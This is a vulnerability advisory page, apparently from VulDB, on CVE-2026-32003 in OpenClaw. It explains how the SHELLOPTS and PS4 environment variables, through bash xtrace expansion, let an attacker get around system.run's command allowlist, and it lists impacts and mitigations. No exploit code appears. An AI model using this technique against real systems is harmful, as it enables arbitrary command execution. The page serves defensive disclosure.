CVE-2026-32003 in OpenClaw
Summary
by MITRE • 03/20/2026
OpenClaw versions prior to 2026.2.22 contain an environment variable injection vulnerability in the system.run function that allows attackers to bypass command allowlist restrictions via SHELLOPTS and PS4 environment variables. An attacker who can invoke system.run with request-scoped environment variables can execute arbitrary shell commands outside the intended allowlisted command body through bash xtrace expansion.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 03/24/2026
The vulnerability identified as CVE-2026-32003 affects OpenClaw versions prior to 2026.2.22 and represents a critical environment variable injection flaw within the system.run function. This weakness stems from inadequate sanitization of environment variables when executing shell commands, creating a pathway for attackers to bypass intended command allowlist restrictions. The vulnerability specifically leverages the SHELLOPTS and PS4 environment variables to manipulate bash execution behavior, exploiting the shell's xtrace expansion mechanism to execute unintended commands.
The technical implementation of this vulnerability resides in how the system.run function handles environment variables passed during command execution. When attackers can inject environment variables within the request scope, they can manipulate the SHELLOPTS variable to enable xtrace functionality and simultaneously set PS4 to contain malicious shell code. This combination allows attackers to inject commands that execute outside the intended allowlisted command boundaries, effectively circumventing the security controls designed to restrict shell command execution. The flaw operates at the intersection of improper input validation and insufficient environment variable sanitization, creating a dangerous attack vector that can be exploited in systems where shell command execution is permitted.
The operational impact of this vulnerability is severe as it enables arbitrary code execution capabilities that can compromise entire systems. Attackers can leverage this vulnerability to execute malicious commands with the privileges of the application process, potentially leading to complete system compromise, data exfiltration, or lateral movement within network environments. The vulnerability is particularly dangerous because it operates silently within the allowed execution framework, making detection difficult. Systems utilizing OpenClaw for automation or system management tasks become vulnerable to this attack vector, especially in environments where privilege escalation or command injection attacks are already considered threats. This vulnerability directly maps to CWE-78 and CWE-74, representing shell injection and environment variable manipulation weaknesses respectively, and aligns with attack patterns found in the MITRE ATT&CK framework under TA0002 (Execution) and TA0004 (Privilege Escalation).
Mitigation strategies for this vulnerability should focus on immediate patching to OpenClaw version 2026.2.22 or later, which addresses the environment variable handling in the system.run function. Organizations should implement strict environment variable filtering and sanitization mechanisms, particularly for SHELLOPTS and PS4 variables, to prevent injection attacks. Additionally, privilege separation and least-privilege principles should be enforced when executing shell commands, ensuring that applications operate with minimal required permissions. Network segmentation and monitoring of command execution patterns can help detect anomalous behavior indicative of exploitation attempts. Regular security assessments should verify that environment variable handling follows secure coding practices, and automated tools should be deployed to scan for similar vulnerabilities in other system components that may be susceptible to the same attack patterns.